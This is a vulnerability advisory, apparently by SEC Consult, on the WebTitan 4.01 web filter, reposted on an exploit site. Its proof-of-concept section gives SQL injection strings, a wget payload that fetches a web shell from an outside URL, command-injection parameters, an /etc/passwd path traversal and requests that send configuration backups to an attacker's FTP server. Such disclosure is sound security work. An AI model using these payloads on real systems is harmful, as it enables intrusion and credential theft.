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WebTitan 4.01 (Build 68) - Multiple Vulnerabilities

SEC Consult
Security Risk High
web applications
Date add
title: Multiple critical vulnerabilities
            product: WebTitan
 vulnerable version: 4.01 (Build 68)
      fixed version: 4.04
             impact: critical
           homepage: http://www.webtitan.com
              found: 2014-04-07
                 by: Robert Giruckas, Mindaugas Liudavicius
                     SEC Consult Vulnerability Lab
Vendor description:
"WebTitan offers ultimate protection from internet based threats and powerful
web filtering functionalities to SMBs, Service Providers and Education sectors
around the World."
Source: http://www.webtitan.com/about-us/webtitan
Business recommendation:
Multiple critical security vulnerabilities have been identified in the WebTitan
system. Exploiting these vulnerabilities potential attackers could take control
over the entire system.
It is highly recommended by SEC Consult not to use this software until a
thorough security review has been performed by security professionals and all
identified issues have been resolved.
Vulnerability overview/description:
1) SQL Injection
A SQL injection vulnerability in the /categories-x.php script allows
unauthenticated remote attackers to execute arbitrary SQL commands via the
"sortkey" parameter.
2) Remote command execution
Multiple remote command execution vulnerabilities were detected in the
WebTitan GUI. This security flaw exists due to lack of input validation. An
authenticated attacker of any role (Administrator, Policy Manager, Report
Manager) can execute arbitrary OS commands with the privileges of the web
3) Path traversal
The web GUI fails to properly filter user input passed to the logfile
parameter. This leads to arbitrary file download by unauthenticated attackers.
4) Unprotected Access
The web GUI does not require authentication for certain PHP scripts. This
security issue allows an unauthenticated remote attacker to download Webtitan
configuration backup (including hashed user credentials) to the attacker's FTP
Proof of concept:
1) SQL Injection
The manipulation of the "sortkey" parameter allows users to modify the
original SQL query.
    GET /categories-x.php HTTP/1.1
    /categories-x.php?getcategories&sortkey=name) limit 1;--
    /categories-x.php?getcategories&sortkey=name) limit 5;--
2) Remote command execution
Due to improper user input validation it is possible to inject arbitrary OS
commands using backticks ``. Some of the affected files do not sanitize any
type of shell metacharacters, this allows an attacker to use more flexible OS
commands. Tested and working payload for most scripts: `/usr/local/bin/wget
http://<URL to shell script> -O /usr/blocker/www/graph/CPU/xshell.php`
Affected scripts: logs-x.php, users-x.php, support-x.php, time-x.php,
scheduledreports-x.php, reporting-x.php, network-x.php
    a. logs-x.php, vulnerable parameters: fname, logfile
        /logs-x.php?jaction=view&fname=webtitan.log;ls -la
        /logs-x.php POST Content: jaction=delete&logfile=<PAYLOAD>
    b. users-x.php, vulnerable parameters: ldapserver
    c. support-x.php, vulnerable parameters: tracehost, dighost, pinghost
        /support-x.php POST Content: jaction=ping&pinghost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&dighost=<PAYLOAD>
        /support-x.php POST Content: jaction=ping&tracehost=<PAYLOAD>
    d. time-x.php, vulnerable parameters: ntpserversList
       /time-x.php POST Content:
    e. scheduledreports-x.php, vulnerable parameters: reportid
    f. reporting-x.php, vulnerable parameter: delegated_admin
       /reporting-x.php POST Content:
    g. network-x.php, vulnerable parameters: hostname (limited to 15 symbols
       length), domain
3) Path traversal
Due to missing input filtering in the logs-x.php script it is possible to
download arbitrary files without any authentication:
    Vulnerable parameters: logfile
    Post Content: jaction=download&logfile=../../../etc/passwd
4) Unprotected Access
    a. Since the script backup-x.php does not require authentication, remote
       attackers can initiate a backup of Webtitan configuration files to a remote
       FTP server by executing the following requests:
       POST Content:
       Where <IP> is the remote FTP server IP, <login> - remote FTP server
       login, <password> - remote FTP, <path> - path where to store backup
       With the next request, an attacker can force the backup to be uploaded
       to the attacker's FTP server:
       POST Content: jaction=exportNowtoFtp
     b. The autoconf-x.php, contentfiltering-x.php, license-x.php, msgs.php,
        reports-drill.php scripts can be reached by an unauthenticated user. The
        categories-x.php, urls-x.php can also be accessed by faking the HTTP User-Agent
        header, by setting it to "Shockwave Flash".
Vulnerable / tested versions:
The vulnerabilities have been verified to exist in the WebTitan VMware
appliance ver. 4.0.1 (build 68). It is assumed that previous versions are
affected too.

#  0day.today [2024-07-02]  #